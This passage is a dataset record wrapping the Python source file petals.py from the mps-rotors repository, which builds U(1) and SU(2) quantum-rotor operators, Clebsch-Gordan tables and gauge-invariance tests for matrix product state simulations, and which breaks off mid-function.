repo_name
stringlengths 5
114
| repo_url
stringlengths 24
133
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| branch_name
stringclasses 209
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 9.83k
683M
⌀ | star_events_count
int64 0
22.6k
| fork_events_count
int64 0
4.15k
| gha_license_id
stringclasses 17
values | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_language
stringclasses 115
values | files
listlengths 1
13.2k
| num_files
int64 1
13.2k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
amilsted/mps-rotors
|
https://github.com/amilsted/mps-rotors
|
74dc07b38b71abd06d014abde187b5336a29e10d
|
f040c879cc9db7c41fc2749efba76af345b844ff
|
da2c3981868a0de6a3a1ea239d45f5ea3dfd685a
|
refs/heads/master
| 2021-01-23T08:56:11.410270 | 2018-09-10T19:40:38 | 2018-09-10T19:40:38 | 39,568,375 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4431118965148926,
"alphanum_fraction": 0.4833640456199646,
"avg_line_length": 33.52920913696289,
"blob_id": "6066837fb1d5ae00148ef7c035e036ae96a57eec",
"content_id": "3bc12ccef3d59abfadf42075bc57ae38e379bf10",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 79797,
"license_type": "permissive",
"max_line_length": 139,
"num_lines": 2311,
"path": "/petals.py",
"repo_name": "amilsted/mps-rotors",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport datetime\nimport copy\nimport shutil\ntry:\n import fcntl\nexcept ImportError:\n print \"NO FILE LOCKING AVAILABLE (no fcntl on windows...)\"\nimport scipy as sp\nimport scipy.linalg as la\nimport sympy as sy\nimport evoMPS.tdvp_uniform as tdvp\nimport evoMPS.dynamics as dy\n\ntry:\n import matplotlib.cm as cm\nexcept ImportError:\n print \"Matplotlib error...\"\n\nRES_LOAD_FROM = 'petal_res.txt'\nuse_CUDA = False\n\ncols = {'G': 0,\n 'g2inv': 1, \n 'D': 2, \n 'L': 3,\n 'max_ir': 4,\n 'eta': 5,\n 'max_ir_oc':6,\n 'energy': 7, \n 'cl': 8, \n 'entr_max': 9, \n 'U_av': 10, \n 'U_0': 11,\n 'U2_0': 12,\n 'P_av': 13,\n 'P_0': 14,\n 'P2_0': 15,\n 'ReUUH_av': 16,\n 'ReUUH_0': 17,\n 'ReUUH2_0': 18,\n 'wv_dom': 19, \n 'wv_fit': 20, \n 'gap': 21, \n 'exc_fn': 22,\n 'fn': 23}\n \nPARAM = 'g2inv'\nPARAM_TEX = 'g^{-2}'\n \nnum_floatcols = len(cols) - 2\n\ndef get_ops(G, max_irrep):\n if G == 1:\n return U1_get_ops(max_irrep)\n if G == 2:\n return SU2_get_ops(max_irrep)\n\ndef U1_get_ops(max_n):\n d = 2 * max_n + 1\n U = sp.diag(sp.repeat(1. + 0.j, d - 1), k=-1)\n P = sp.diag(sp.arange(-max_n, +max_n + 1) * (1. + 0.j), k=0)\n P2 = sp.diag(sp.diag(P)**2)\n \n ReUUH = 0.5 * (sp.kron(U, U.conj().T) \n + sp.kron(U.conj().T, U)).reshape(d, d, d, d)\n \n ReUUH_tp = [[0.5 * U, U.conj().T],\n [0.5 * U.conj().T, U]]\n \n U = [[U]]\n P = [P]\n \n return U, P, P2, ReUUH, ReUUH_tp\n \ndef U1_get_L(theta, max_n=5):\n L = sp.diag(sp.exp(-1.j * theta * sp.arange(-max_n, +max_n + 1)), k=0)\n return L\n \ndef U1_get_theta(max_n=5, pos_theta=False):\n d = 2 * max_n + 1\n \n if pos_theta:\n def tf(n, m):\n if n != m:\n return 1.j * (n - m) / (n - m)**2\n else:\n return sp.pi\n else:\n def tf(n, m):\n if n != m:\n return 2.j * ((n - m) * sp.pi * sp.cos((m - n) * sp.pi)\n + sp.sin((m - n) * sp.pi)) / (2*sp.pi * (m - n)**2)\n else:\n return 0\n \n theta = sp.zeros((d, d), sp.complex128)\n for m in xrange(0, d):\n for n in xrange(0, d):\n theta[n, m] = tf(n, m)\n \n return theta\n \ndef U1_get_sqrtU(max_n=5):\n d = 2 * max_n + 1\n def f(n, m):\n return 1.j / (sp.pi * (0.5 + m - n))\n \n return sp.fromfunction(f, (d, d), dtype=sp.complex128)\n \ndef U1_get_interp_single(max_n=5):\n d = 2 * max_n + 1\n def f(n, j, m, k):\n if (m - n) + (k - j) + 1 == 0: \n return 2. * (-1)**(m - n) / (1. + 2. * (m - n)) / sp.pi\n else:\n return 0\n \n res = sp.zeros((d, d, d, d), sp.complex128)\n for n in xrange(0, d):\n for m in xrange(0, d):\n for j in xrange(0, d):\n for k in xrange(0, d):\n res[n, j, m, k] = f(n, j, m, k)\n \n return res.reshape(d**2, d**2) \n \ndef U1_get_interp(ops, max_n=5):\n d = 2 * max_n + 1\n \n U_, P, P2, ReUUH, ReUUH_tp = ops\n U = U_[0][0]\n #sU = U1_get_sqrtU(max_n=max_n)\n \n UU = sp.kron(U, U)\n #sUsU = sp.kron(sU, sU)\n sUsU = U1_get_interp_single(max_n)\n \n UU_pow = [sp.eye(d**2)]\n for n in xrange(1, max_n + 1):\n UU_pow.append(UU.dot(UU_pow[-1]))\n \n def get_sU_pow(m):\n if m % 2 == 0:\n return UU_pow[m/2]\n else:\n return sUsU.dot(UU_pow[m/2])\n \n V = sp.zeros((d**3, d**3), dtype=sp.complex128)\n for n in xrange(-max_n, max_n + 1):\n m1 = d**2 * (n + max_n)\n m2 = m1 + d**2\n V[m1:m2, m1:m2] = (get_sU_pow(n) if n >= 0 else get_sU_pow(-n).conj().T)\n \n return V\n \ndef U1_get_mom_sup(ops, max_n=5):\n d = 2 * max_n + 1\n \n psi = 1./sp.sqrt(d) * sp.ones((d,), dtype=sp.complex128)\n \n return psi\n \ndef U1_get_mom_exp(ops, lam=1, max_n=5):\n psi = sp.exp(-lam * abs(sp.arange(-max_n, max_n + 1)))\n \n psi /= la.norm(psi)\n \n return psi\n \ndef U1_get_mom_test(ops, max_n=5):\n d = 2 * max_n + 1\n psi = sp.zeros((d,), dtype=sp.complex128)\n \n psi[max_n] = 1\n psi[max_n + 2] = psi[max_n - 2] = 0.1\n \n psi /= la.norm(psi)\n \n return psi\n \ndef apply_interp(V, psi, AA, trunc=None):\n d = AA.shape[0]\n D = AA.shape[2]\n \n V = V.reshape((d,d,d,d,d,d))\n \n #In V, the slowest varying index is the new site\n Vpsi = sp.tensordot(V, psi, axes=((3,), (0,))).copy()\n \n Vpsi = Vpsi.reshape((d**3, d**2))\n AA = AA.reshape((d**2, D**2))\n \n B123 = Vpsi.dot(AA)\n \n B123 = B123.reshape((d,d,d,D,D))\n \n #Place the virtual indices at the ends, move the new site to the middle\n #i.e. D, d, d*, d, D (d* is the new site)\n B123 = sp.transpose(B123, axes=(3, 1, 0, 2, 4))\n \n #Prepare for SVD splitting 12 and 3\n B12_3 = B123.reshape((D * d * d, d * D))\n \n B12_3_U, B12_3_s, B12_3_Vh = la.svd(B12_3, full_matrices=False)\n if not trunc is None:\n B12_3_s = B12_3_s[:trunc]\n B12_3_U = B12_3_U[:, :trunc]\n B12_3_Vh = B12_3_Vh[:trunc, :]\n \n B12_3_sr = la.diagsvd(sp.sqrt(B12_3_s), len(B12_3_s), len(B12_3_s))\n \n B3 = B12_3_sr.dot(B12_3_Vh).reshape((len(B12_3_sr), d, D)) \n B3 = sp.transpose(B3, axes=(1, 0, 2)).copy()\n \n B1_2 = B12_3_U.dot(B12_3_sr).reshape(D * d, d * B3.shape[1])\n \n B1_2_U, B1_2_s, B1_2_Vh = la.svd(B1_2, full_matrices=False)\n if not trunc is None:\n B1_2_s = B1_2_s[:trunc]\n B1_2_U = B1_2_U[:, :trunc]\n B1_2_Vh = B1_2_Vh[:trunc, :]\n \n B1_2_sr = la.diagsvd(sp.sqrt(B1_2_s), len(B1_2_s), len(B1_2_s))\n \n B1 = B1_2_U.dot(B1_2_sr).reshape(D, d, len(B1_2_sr))\n B1 = sp.transpose(B1, axes=(1, 0, 2))\n \n B2 = B1_2_sr.dot(B1_2_Vh).reshape(len(B1_2_sr), d, B3.shape[1])\n B2 = sp.transpose(B2, axes=(1, 0, 2))\n \n return B1, B2, B3\n \ndef get_interp_state(V, psi, s, trunc):\n assert s.L == 1\n s.update()\n AA = tdvp.tm.calc_AA(s.A[0], s.A[0])\n \n B1, B2, B3 = apply_interp(V, psi, AA, trunc=trunc)\n \n B31 = tdvp.tm.calc_AA(B3, B1)\n \n C3, C4, C1 = apply_interp(V, psi, B31, trunc=trunc)\n \n s2 = create_tdvp(trunc, s.ham, ham_tp=s.ham_tp, L=4)\n \n s2.A = [C1, B2, C3, C4]\n s2.update()\n \n #This gives the same result as get_interp_state_2 for |psi> = |0>. Good.\n #Also for |psi> = 1/sqrt(2) (|2> + |-2>).\n #Results should differ for |psi> = 1/sqrt(2) (|1> + |-1>).\n #..they do, but now get_interp_state changes the curvature\n #between the original sites... :( get_interp_state_2 does not.\n \n return s2\n \ndef get_interp_state_once(V, psi, s, trunc):\n assert s.L == 1\n s.update()\n AA = tdvp.tm.calc_AA(s.A[0], s.A[0])\n \n B1, B2, B3 = apply_interp(V, psi, AA, trunc=trunc)\n \n s2 = create_tdvp(trunc, s.ham, ham_tp=s.ham_tp, L=3)\n \n s2.A = [B1, B2, B3]\n s2.update()\n \n return s2\n \ndef get_interp_state_2(psi, s1, trunc=None, max_n=5, ops=None):\n if ops is None:\n ops = get_ops(1, max_n)\n \n d = 2 * max_n + 1\n D = s1.D\n \n psif = psi != 0\n d_eff = sp.count_nonzero(psif)\n ds = sp.arange(d)[psif]\n \n eyeD = sp.eye(D)\n \n B1 = sp.zeros((d, D, d_eff, D, d_eff), dtype=sp.complex128)\n for j in xrange(d_eff):\n B1[ds[j], :, j, :, j] = eyeD * psi[psif][j]\n \n B1 = B1.reshape((d, D * d_eff, D * d_eff))\n \n A = s1.A[0].copy()\n \n U = ops[0][0][0]\n U_pow = [sp.eye(d)]\n for n in xrange(1, max_n + 1):\n U_pow.append(U.dot(U_pow[-1]))\n \n sU = U1_get_sqrtU(max_n=max_n)\n \n sU_pow = [sp.eye(d)]\n for m in xrange(1, 2 * max_n + 1):\n if m % 2 == 0:\n sU_pow.append(U_pow[m/2])\n else:\n sU_pow.append(sU.dot(U_pow[m/2]))\n \n def get_sU_pow(m):\n if m < 0:\n return sU_pow[-m].conj().T\n else:\n return sU_pow[m]\n \n MPO = []\n for n in xrange(-max_n, max_n + 1):\n row = []\n if psif[n + max_n]:\n MPO.append(row)\n for m in xrange(-max_n, max_n + 1):\n if psif[m + max_n]:\n row.append(get_sU_pow((m + n)))\n \n MPO = sp.array(MPO, dtype=sp.complex128)\n \n B2 = tdvp.tm.apply_MPO_local(MPO, A)\n \n s2 = create_tdvp(D * d_eff, s1.ham, ham_tp=s1.ham_tp, L=2)\n \n s2.A = [B1, B2]\n s2.update()\n \n return s2 \n \n#def SU2_get_l(m): \n# import sympy as sy\n# return sy.floor((-1 + sy.sqrt(1 + 8 * m)) / 2) / 2\n# \n#def SU2_get_j(m):\n# return m - 2 * SU2_get_l(m)**2 - 2 * SU2_get_l(m)\n# \n#def SU2_get_CG(m1, m2, m, itb):\n# import sympy.physics.quantum.cg as cg\n# return cg.CG(SU2_get_l(m1), SU2_get_j(m1), SU2_get_l(m2), SU2_get_j(m2), \n# SU2_get_l(m), SU2_get_j(m)).doit()\n\ndef SU2_get_Ws(tl):\n \"\"\"This gets the generalized W states, from which irreps of group elements\n and the generators can be obtained.\n \"\"\"\n from itertools import permutations\n def bool2int(x):\n y = 0\n for i,j in enumerate(x):\n y += j<<i\n return y\n \n W = [None] * (tl + 1)\n for m in xrange(tl + 1):\n perms = sp.array(list(set(permutations([0] * (tl - m) + [1] * m))))\n W[m] = sp.zeros((2**tl, ), dtype=sp.float64)\n for p in perms:\n W[m][bool2int(p)] += 1. / sp.sqrt(len(perms))\n #print W[m], sp.inner(W[m], W[m])\n \n return W\n \n\ndef SU2_get_irrep(U, tl, W=None):\n if W is None:\n W = SU2_get_Ws(tl)\n \n prod = sp.array([[1]])\n for i in xrange(tl):\n prod = sp.kron(U, prod)\n \n Ul = sp.zeros((tl + 1, tl + 1), dtype=sp.complex128)\n for m in xrange(tl + 1):\n for n in xrange(tl + 1):\n Ul[m, n] = W[m].T.dot(prod.dot(W[n]))\n \n return Ul\n \npaus = [0.5 * sp.array([[0, 1], [1, 0]]), \n 0.5j * sp.array([[0, -1], [1, 0]]),\n 0.5 * sp.array([[1, 0], [0, -1]])]\n \ndef SU2_get_gen(al, tl, W=None):\n if W is None:\n W = SU2_get_Ws(tl)\n \n pau = paus[al]\n \n M = sp.zeros((2**tl, 2**tl), dtype=sp.complex128)\n for n in xrange(tl):\n M += sp.kron(sp.eye(2**(n)), sp.kron(pau, sp.eye(2**(tl - n - 1))))\n \n tau = sp.zeros((tl + 1, tl + 1), dtype=sp.complex128)\n for m in xrange(tl + 1):\n for n in xrange(tl + 1):\n tau[m, n] = W[m].T.dot(M.dot(W[n]))\n \n return tau\n \ndef SU2_test_irreps(tl):\n l = tl / 2.\n W = SU2_get_Ws(tl)\n taus = [SU2_get_gen(al, tl, W=W) for al in [0, 1, 2]]\n eye_test = taus[0].dot(taus[0].conj().T) + taus[1].dot(taus[1].conj().T) + taus[2].dot(taus[2].conj().T)\n print \"test generators:\", sp.allclose(eye_test, sp.eye(tl + 1) * l * (l + 1))\n print \"[t0,t1] - it2 = 0:\", sp.allclose(taus[0].dot(taus[1]) - taus[1].dot(taus[0]), 1.j * taus[2])\n print \"[t2,t0] - it1 = 0:\", sp.allclose(taus[2].dot(taus[0]) - taus[0].dot(taus[2]), 1.j * taus[1])\n print \"[t1,t2] - it0 = 0:\", sp.allclose(taus[1].dot(taus[2]) - taus[2].dot(taus[1]), 1.j * taus[0])\n \n om = sp.rand(3)\n G_half = la.expm(1.j * (om[0] * paus[0] + om[1] * paus[1] + om[2] * paus[2]))\n print \"G_half unitary\", sp.allclose(G_half.dot(G_half.conj().T), sp.eye(2))\n Gl = la.expm(1.j * (om[0] * taus[0] + om[1] * taus[1] + om[2] * taus[2]))\n print \"G_l unitary\", sp.allclose(Gl.dot(Gl.conj().T), sp.eye(tl + 1))\n Gl_ = SU2_get_irrep(G_half, tl, W=W)\n print \"G_l test\", sp.allclose(Gl, Gl_)\n\ndef SU2_get_PL(max_2l=3):\n itb = SU2_build_index_ints(max_2l=max_2l)\n dim = len(itb)\n \n tl = 0\n tau_l = SU2_get_gen(0, tl)\n PL = [None] * 3\n for al in [0, 1, 2]:\n PL[al] = sp.zeros((dim, dim), dtype=sp.complex128)\n for mL in xrange(dim):\n for mR in xrange(dim):\n tlL, jpL, kpL = itb[mL]\n tlR, jpR, kpR = itb[mR]\n if not (tlL == tlR and kpL == kpR):\n continue\n \n if tlL != tl:\n tl = tlL\n tau_l = SU2_get_gen(al, tl)\n\n PL[al][mL, mR] = tau_l[jpR, jpL]\n \n return PL\n \ndef SU2_get_PR(max_2l=3):\n itb = SU2_build_index_ints(max_2l=max_2l)\n dim = len(itb)\n \n tl = 0\n tau_l = SU2_get_gen(0, tl)\n PR = [None] * 3\n for al in [0, 1, 2]:\n PR[al] = sp.zeros((dim, dim), dtype=sp.complex128)\n for mL in xrange(dim):\n for mR in xrange(dim):\n tlL, jpL, kpL = itb[mL]\n tlR, jpR, kpR = itb[mR]\n if not (tlL == tlR and jpL == jpR):\n continue\n \n if tlL != tl:\n tl = tlL\n tau_l = SU2_get_gen(al, tl)\n\n PR[al][mL, mR] = -tau_l[kpL, kpR]\n \n return PR\n \ndef SU2_test_U_PL(max_2l=3):\n PL = SU2_get_PL(max_2l=max_2l)\n U = SU2_get_U(max_2l=max_2l)\n \n print \"U_0,0 = U*_1,1\", sp.allclose(U[0][0], U[1][1].conj().T)\n print \"U_0,1 = -U*_1,0\", sp.allclose(U[0][1], -U[1][0].conj().T)\n #print \"U_0,0 U*_0,0 = 1 - U_0,1 U*_0,1\", sp.allclose(U[0][0].dot(U[1][1]), sp.eye(U[0][0].shape[0]) + U[0][1].dot(U[1][0]))\n \n for al in [0, 1, 2]:\n for m in [0, 1]:\n for n in [0, 1]:\n com = PL[al].dot(U[m][n]) - U[m][n].dot(PL[al])\n com_ = 0\n for k in [0, 1]:\n com_ += paus[al][m, k] * U[k][n]\n print \"[PL_%d, U_%d,%d] = (F_%d U)_%d,%d:\" % (al, m, n, al, m, n), \\\n sp.allclose(com, com_), la.norm(com - com_)\n for al in [0, 1, 2]:\n for m in [0, 1]:\n for n in [0, 1]:\n com = PL[al].dot(U[m][n].conj().T) - U[m][n].conj().T.dot(PL[al])\n com_ = 0\n for k in [0, 1]:\n com_ += -paus[al][k, m] * U[k][n].conj().T\n print \"[PL_%d, U*_%d,%d] = (U*' F_%d)_%d,%d:\" % (al, m, n, al, m, n), \\\n sp.allclose(com, com_), la.norm(com - com_)\n \n P2 = SU2_get_P2(max_2l=max_2l)\n P2_ = PL[0].dot(PL[0]) + PL[1].dot(PL[1]) + PL[2].dot(PL[2])\n print \"P2 = PL_0^2 + PL_1^2 + PL_2^2:\", sp.allclose(P2, P2_)\n \n d_maxtl = sp.sum((max_2l + 1)**2)\n start_maxtl = len(P2) - d_maxtl\n \n UUd = sp.zeros_like(U[0][0])\n for m in [0, 1]:\n for n in [0, 1]:\n UUd.fill(0)\n for k in [0, 1]:\n UUd += U[m][k].dot(U[n][k].conj().T)\n print \"(U U^dag)_%d,%d = delta_%d,%d (restricted to all but highest irrep):\" % (m, n, m, n), \\\n sp.allclose(UUd[:start_maxtl, :start_maxtl], 0 if m != n else sp.eye(start_maxtl))\n print \"Error (norm distance) in highest irrep:\", la.norm(UUd[start_maxtl:, start_maxtl:] - 0 if m != n else sp.eye(d_maxtl))\n \n eijk = sp.zeros((3, 3, 3))\n eijk[0, 1, 2] = eijk[1, 2, 0] = eijk[2, 0, 1] = 1\n eijk[0, 2, 1] = eijk[2, 1, 0] = eijk[1, 0, 2] = -1\n for al in [0, 1, 2]:\n for be in [0, 1, 2]:\n com = PL[al].dot(PL[be]) - PL[be].dot(PL[al])\n gas = sp.argwhere(eijk[al, be, :] != 0)\n if len(gas) > 0:\n ga = gas[0]\n com_ = -1.j * eijk[al, be, ga] * PL[ga]\n else:\n com_ = 0\n print \"[PL_%d, PL_%d] = -1j * (eps^%d,%d_ga PL_ga)\" % (al, be, al, be), sp.allclose(com, com_)\n\ndef SU2_get_L(U, max_2l=3):\n itb = SU2_build_index_ints(max_2l=max_2l)\n dim = len(itb)\n \n tl = 0\n G_l = sp.array([[1]])\n L = sp.zeros((dim, dim), dtype=sp.complex128)\n for mL in xrange(dim):\n for mR in xrange(dim):\n tlL, jpL, kpL = itb[mL]\n tlR, jpR, kpR = itb[mR]\n if not (tlL == tlR and kpL == kpR):\n continue\n \n if tlL != tl:\n tl = tlL\n G_l = SU2_get_irrep(U.conj().T, tl)\n\n L[mL, mR] = G_l[jpR, jpL]\n \n return L\n \ndef SU2_get_R(U, max_2l=3):\n itb = SU2_build_index_ints(max_2l=max_2l)\n dim = len(itb)\n \n tl = 0\n G_l = sp.array([[1]])\n R = sp.zeros((dim, dim), dtype=sp.complex128)\n for mL in xrange(dim):\n for mR in xrange(dim):\n tlL, jpL, kpL = itb[mL]\n tlR, jpR, kpR = itb[mR]\n if not (tlL == tlR and jpL == jpR):\n continue\n \n if tlL != tl:\n tl = tlL\n G_l = SU2_get_irrep(U, tl)\n\n R[mL, mR] = G_l[kpL, kpR]\n \n return R\n\ndef SU2_get_random_U():\n om = sp.rand(3)\n U = la.expm(1.j * (om[0] * paus[0] + om[1] * paus[1] + om[2] * paus[2]))\n return U\n\ndef SU2_test_LR(max_2l=3):\n U = SU2_get_random_U()\n V = SU2_get_random_U()\n\n L_U = SU2_get_L(U, max_2l=max_2l)\n R_V = SU2_get_R(V, max_2l=max_2l)\n print \"[L_U, R_V] = 0:\", sp.allclose(L_U.dot(R_V) - R_V.dot(L_U), 0), la.norm(L_U.dot(R_V) - R_V.dot(L_U))\n \n L_Ui = SU2_get_L(U.conj().T, max_2l=max_2l)\n R_Vi = SU2_get_R(V.conj().T, max_2l=max_2l)\n print \"L_Ui = L_U^dag:\", sp.allclose(L_U.conj().T, L_Ui)\n print \"R_Vi = R_V^dag:\", sp.allclose(R_V.conj().T, R_Vi)\n \n L_I = SU2_get_L(sp.eye(2), max_2l=max_2l)\n R_I = SU2_get_L(sp.eye(2), max_2l=max_2l)\n print \"L_I = I:\", sp.allclose(L_I, sp.eye(len(R_I)))\n print \"R_I = I:\", sp.allclose(R_I, sp.eye(len(R_I)))\n\ndef SU2_get_P2(max_2l=3):\n twols = sp.arange(max_2l + 1)\n dim = sp.sum((twols + 1)**2)\n \n P2diag = []\n for twol in twols:\n P2diag += [twol/2. * (twol/2. + 1)] * (twol + 1)**2\n \n assert len(P2diag) == dim\n \n return sp.diag(sp.array(P2diag, dtype=sp.float64))\n \ndef SU2_build_index(max_2l=3):\n tbl = []\n for twol in xrange(max_2l + 1):\n l = twol/2.\n tbl += [[l, jp - l, kp - l] for jp in xrange(twol + 1) for kp in xrange(twol + 1)]\n return sp.array(tbl, dtype=sp.float64)\n \ndef SU2_build_index_ints(max_2l=3):\n tbl = []\n for twol in xrange(max_2l + 1):\n tbl += [[twol, jp, kp] for jp in xrange(twol + 1) for kp in xrange(twol + 1)]\n return sp.array(tbl)\n \ndef SU2_build_CGs(max_2l=3):\n \"\"\"This grabs a tensor of Clebsch-Gordan coefficients <lL,mL|lR,mR;1/2,mM>\n skipping the zeros where the l1 != l3 +/- 1/2.\n There is a cutoff in l given by max_2l.\n \n Uses sympy to get the CG coeffients exactly before converting to floats.\n \"\"\"\n from sympy.physics.quantum.cg import CG\n \n vtb = []\n half = sy.S(1) / 2\n for twolL in xrange(max_2l + 1):\n vtb_ = [None] * (max_2l + 1)\n lL = sy.S(twolL) / 2\n for twolR in [twolL - 1, twolL + 1]:\n if twolR > max_2l or twolR < 0:\n continue\n lR = sy.S(twolR) / 2\n vtb_[twolR] = [[[sy.N(CG(lR, mRp - lR, half, mMp - half, lL, mLp - lL).doit())\n for mRp in xrange(twolR + 1)]\n for mMp in [0, 1]]\n for mLp in xrange(twolL + 1)]\n vtb.append(vtb_)\n return vtb\n \ndef SU2_test_CGs(max_2l=3):\n CGs = SU2_build_CGs(max_2l=max_2l)\n \n UCG = sp.zeros((6, 6), dtype=sp.float64)\n UCG.fill(sp.NaN)\n tlR = 2\n for tlL in [tlR - 1, tlR + 1]:\n if tlL < 0 or tlL > max_2l:\n continue\n shft = (4 if tlL == 1 else 0)\n for mLp in xrange(tlL + 1):\n for mMp in [0, 1]:\n for mRp in xrange(tlR + 1):\n UCG[shft + mLp, mMp * (tlR + 1) + mRp] = CGs[tlL][tlR][mLp][mMp][mRp]\n print UCG\n print \"CGd CG = 1:\", sp.allclose(UCG.dot(UCG.conj().T), sp.eye(len(UCG)))\n \ndef SU2_test_trunc_CG(max_2l=3):\n CGs = SU2_build_CGs(max_2l=max_2l)\n dim = sp.sum(sp.arange(max_2l + 1) + 1)\n \n def get_M(tl, m):\n return (tl**2 + tl + 2 * m) / 2\n \n #print get_M(0, 0), get_M(1, 0), get_M(1, 1), get_M(2, 0), get_M(2, 1), get_M(2, 2), get_M(3, 0), get_M(3, 1)\n \n eye_ = sp.zeros((dim, dim), dtype=sp.float64)\n eye_.fill(sp.NaN)\n for tl1 in xrange(max_2l + 1):\n for tl2 in xrange(max_2l + 1):\n for m1 in xrange(tl1 + 1):\n for m2 in xrange(tl2 + 1):\n entry = 0\n for tl in xrange(max_2l + 1):\n for m in xrange(tl + 1):\n for mh in [0, 1]:\n if CGs[tl1][tl] is None or CGs[tl2][tl] is None:\n continue\n entry += (tl + 1) / sp.sqrt(tl1 + 1) / sp.sqrt(tl2 + 1) * CGs[tl1][tl][m1][mh][m] * CGs[tl2][tl][m2][mh][m]\n eye_[get_M(tl1, m1), get_M(tl2, m2)] = entry\n return eye_.diagonal()\n \ndef SU2_get_U(max_2l=3):\n itb = SU2_build_index_ints(max_2l=max_2l)\n dim = len(itb)\n \n CGs = SU2_build_CGs(max_2l=max_2l)\n\n U = [[None, None], [None, None]]\n for m in range(2):\n for n in range(2):\n U[m][n] = sp.zeros((dim, dim), dtype=sp.float64)\n for mL in xrange(dim):\n for mR in xrange(dim):\n tlL, jpL, kpL = itb[mL]\n tlR, jpR, kpR = itb[mR]\n \n if CGs[tlL][tlR] is None: #Combination is always zero.\n continue\n \n CGj = CGs[tlL][tlR][jpL][m][jpR]\n CGk = CGs[tlL][tlR][kpL][n][kpR]\n U[m][n][mL, mR] = (sp.sqrt((tlR + 1.) / (tlL + 1.)) * CGj * CGk)\n return U\n \ndef SU2_get_RetrUUH(U):\n d = U[0][0].shape[0]\n trUUH = sp.zeros((d**2, d**2), dtype=U[0][0].dtype)\n for j in [0, 1]:\n for k in [0, 1]:\n trUUH += 0.5 * (sp.kron(U[j][k], U[j][k].T) + sp.kron(U[j][k].T, U[j][k]))\n \n return trUUH.reshape(d, d, d, d)\n \ndef SU2_get_RetrUUH_tp(U):\n trUUH = []\n for k in [0, 1]: #abbreviated version, exploiting unitary structure\n trUUH.append([U[0][k], U[0][k].T])\n trUUH.append([U[0][k].T, U[0][k]])\n \n return trUUH\n \ndef SU2_get_ops(max_2l=3):\n PL = SU2_get_PL(max_2l=max_2l)\n P2 = SU2_get_P2(max_2l=max_2l)\n U = SU2_get_U(max_2l=max_2l)\n RetrUUH = SU2_get_RetrUUH(U)\n RetrUUH_tp = SU2_get_RetrUUH_tp(U)\n \n return U, PL, P2, RetrUUH, RetrUUH_tp\n \ndef SU2_test_GI(max_2l=3):\n U, PL, P2, RetrUUH, RetrUUH_tp = SU2_get_ops(max_2l=max_2l)\n \n RetrUUH = RetrUUH.reshape((len(P2)**2, len(P2)**2))\n \n om = sp.rand(3)\n U = la.expm(1.j * (om[0] * paus[0] + om[1] * paus[1] + om[2] * paus[2]))\n\n L_U = SU2_get_L(U, max_2l=max_2l)\n R_U = SU2_get_R(U, max_2l=max_2l)\n \n LR_U = L_U.dot(R_U)\n LR_U_12 = sp.kron(LR_U, LR_U)\n\n print \"Gauge noninvariance:\"\n print \"LR_U U_00 LR_U* != U_00:\", not sp.allclose(LR_U.dot(U[0][0]).dot(LR_U.conj().T), U[0][0])\n print \"LR_U U_01 LR_U* != U_01:\", not sp.allclose(LR_U.dot(U[0][1]).dot(LR_U.conj().T), U[0][1])\n print \"LR_U U_10 LR_U* != U_10:\", not sp.allclose(LR_U.dot(U[1][0]).dot(LR_U.conj().T), U[1][0])\n print \"LR_U U_11 LR_U* != U_11:\", not sp.allclose(LR_U.dot(U[1][1]).dot(LR_U.conj().T), U[1][1])\n print \"LR_U PL_0 LR_U* != PL_0:\", not sp.allclose(LR_U.dot(PL[0]).dot(LR_U.conj().T), PL[0])\n print \"LR_U PL_1 LR_U* != PL_1:\", not sp.allclose(LR_U.dot(PL[1]).dot(LR_U.conj().T), PL[1])\n print \"LR_U PL_2 LR_U* != PL_2:\", not sp.allclose(LR_U.dot(PL[2]).dot(LR_U.conj().T), PL[2])\n \n print \"\\nGauge invariance (global rotation from left and right):\"\n print \"LR_U P2 LR_U* = P2:\", sp.allclose(LR_U.dot(P2).dot(LR_U.conj().T), P2)\n print \"(LR_U x LR_U) RetrUUH (LR_U* x LR_U*) = RetrUUH:\", sp.allclose(LR_U_12.dot(RetrUUH).dot(LR_U_12.conj().T), RetrUUH)\n \n L_U_12 = sp.kron(L_U, L_U)\n R_U_12 = sp.kron(R_U, R_U)\n \n print \"\\nRotation invariance:\"\n print \"L_U P2 L_U* = P2:\", sp.allclose(L_U.dot(P2).dot(L_U.conj().T), P2)\n print \"R_U P2 R_U* = P2:\", sp.allclose(R_U.dot(P2).dot(R_U.conj().T), P2)\n print \"(L_U x L_U) RetrUUH (L_U* x L_U*) = RetrUUH:\", sp.allclose(L_U_12.dot(RetrUUH).dot(L_U_12.conj().T), RetrUUH)\n print \"(R_U x R_U) RetrUUH (R_U* x R_U*) = RetrUUH:\", sp.allclose(R_U_12.dot(RetrUUH).dot(R_U_12.conj().T), RetrUUH)\n \ndef SU2_test_rotor(max_2l=3):\n U, PL, P2, RetrUUH, RetrUUH_tp = SU2_get_ops(max_2l=max_2l)\n \n Fs = paus + [0.5j * sp.eye(2)]\n N = [sum([-1.j * Fs[al][m, n] * U[n][m] for m in [0, 1] for n in [0, 1]])\n for al in [0, 1, 2, -1]]\n \n NN = sum([sp.kron(Nal, Nal) for Nal in N])\n \n print \"NN = NN*\", sp.allclose(NN, NN.conj().T)\n \n d_maxtl = sp.sum((max_2l + 1)**2)\n start_maxtl = len(P2) - d_maxtl\n for al in [0, 1, 2, -1]:\n for be in [0, 1, 2, -1]:\n com = (N[al].dot(N[be]) - N[be].dot(N[al]))[:start_maxtl, :start_maxtl]\n print \"[N_%d, N_%d] = 0 (up to last irrep)\" % (al, be), sp.allclose(com, 0)\n \n print \"RetrUUH = 2 * NN\", sp.allclose(RetrUUH.reshape(NN.shape), 2 * NN)\n \n eijk = sp.zeros((3, 3, 3))\n eijk[0, 1, 2] = eijk[1, 2, 0] = eijk[2, 0, 1] = 1\n eijk[0, 2, 1] = eijk[2, 1, 0] = eijk[1, 0, 2] = -1\n \n for al in [0, 1, 2]:\n for be in [0, 1, 2, -1]:\n com = PL[al].dot(N[be]) - N[be].dot(PL[al])\n ga_ = None\n if be == -1:\n ga_ = al\n c = -1\n elif al == be:\n ga_ = -1\n c = 